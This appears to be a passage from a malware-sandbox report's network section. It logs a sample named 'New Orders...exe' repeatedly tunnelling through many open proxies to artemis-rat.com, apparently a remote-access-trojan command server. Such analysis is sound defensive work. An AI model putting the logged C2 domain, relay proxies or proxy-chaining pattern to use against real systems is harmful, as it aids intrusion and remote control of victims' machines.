                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:45.932626009 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:45 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1421192.168.2.954218172.67.181.149807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:45.779201031 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:45.933824062 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:45 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1422192.168.2.954136203.222.24.36807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:45.779371023 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:46.080296993 CET340INHTTP/1.1 400 Bad Request
                                                                                        Server: nginx/1.12.2
                                                                                        Date: Mon, 11 Mar 2024 15:16:45 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Content-Length: 173
                                                                                        Connection: close
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.2</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1423192.168.2.95355185.239.121.16841457672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:45.779699087 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1424192.168.2.95410631.134.151.40807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:45.779944897 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1425192.168.2.95414427.96.235.171807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:45.782778978 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:46.083036900 CET326INHTTP/1.1 400 Bad Request
                                                                                        Server: nginx
                                                                                        Date: Mon, 11 Mar 2024 15:16:45 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Content-Length: 166
                                                                                        Connection: close
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1426192.168.2.954232172.67.181.107807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:45.785681009 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:45.939992905 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:45 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1427192.168.2.95216166.228.37.252147917672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:45.797882080 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:48.945208073 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1428192.168.2.95410994.131.14.6610817672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:45.797882080 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1429192.168.2.954243104.24.136.68807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:45.805214882 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:45.959737062 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:45 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1430192.168.2.953698184.185.2.1241457672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:45.806113005 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1431192.168.2.95418872.10.160.17317957672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:45.806488991 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1432192.168.2.95365439.105.27.3031287672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:45.811156988 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:46.149516106 CET38INHTTP/1.1 200 OK
                                                                                        content-length: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1433192.168.2.95359762.109.0.18241017672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:45.814110994 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:48.945255041 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1434192.168.2.95410861.247.25.23141457672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:45.821377039 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1435192.168.2.954149111.90.150.10910807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:45.826889992 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1436192.168.2.954153176.98.81.8580807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:45.827150106 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1437192.168.2.95413841.65.55.2819767672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:45.844733953 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:46.663980961 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:47.773515940 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:49.985198021 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:54.273623943 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:58.570180893 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:02.976332903 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:11.460572004 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:28.460659981 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1438192.168.2.95211845.233.169.4099947672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:45.848181963 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:46.685827017 CET19INHTTP/1.1 200 OK


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1439192.168.2.954158185.101.16.52807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:45.850032091 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1440192.168.2.954228206.220.175.241457672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:45.851738930 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1441192.168.2.95416747.243.205.131287672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:45.856775999 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1442192.168.2.95416431.148.207.153807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:45.856966019 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:46.310705900 CET340INHTTP/1.1 400 Bad Request
                                                                                        Server: nginx/1.12.2
                                                                                        Date: Mon, 11 Mar 2024 15:16:46 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Content-Length: 173
                                                                                        Connection: close
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.2</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1443192.168.2.954156119.3.215.4188887672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:45.857189894 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:47.184243917 CET59INHTTP/1.1 200 Connection Established
                                                                                        Proxy-agent: nginx
                                                                                        Mar 11, 2024 16:16:48.310034037 CET59INHTTP/1.1 200 Connection Established
                                                                                        Proxy-agent: nginx


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1444192.168.2.95209051.89.173.40447197672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:45.860948086 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:46.538917065 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:47.616802931 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1445192.168.2.95354445.119.113.62837672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:45.873219013 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:48.945337057 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:53.815501928 CET19INHTTP/1.1 200 OK


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
